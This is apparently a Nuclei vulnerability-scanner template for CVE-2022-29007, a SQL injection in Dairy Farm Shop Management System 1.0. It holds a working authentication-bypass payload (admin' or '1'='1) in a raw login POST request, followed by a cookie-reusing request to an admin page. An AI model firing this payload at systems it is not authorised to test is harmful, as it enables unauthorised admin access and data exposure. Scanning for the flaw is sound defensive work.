nuclei-templates/cves/2022/CVE-2022-29007.yaml

50 lines
1.5 KiB
YAML

id: CVE-2022-29007
info:
name: Dairy Farm Shop Management System 1.0 - SQL Injection
author: TenBird
severity: critical
description: |
Dairy Farm Shop Management System 1.0 contains multiple SQL injection vulnerabilities via the username and password parameters in the Admin panel. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
reference:
- https://www.exploit-db.com/exploits/50365
- https://phpgurukul.com/dairy-farm-shop-management-system-using-php-and-mysql/
- https://nvd.nist.gov/vuln/detail/CVE-2022-29007
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2022-29007
cwe-id: CWE-89
metadata:
verified: "true"
tags: cve,cve2022,sqli,auth-bypass,edb
requests:
- raw:
- |
POST /dfsms/index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
username=admin' or '1'='1&password=1&login=login
- |
GET /dfsms/add-category.php HTTP/1.1
Host: {{Hostname}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<title>Add Product</title>'
- '<span>Admin'
- 'DFSMS'
condition: and
- type: status
status:
- 200
# Enhanced by mp on 2022/09/28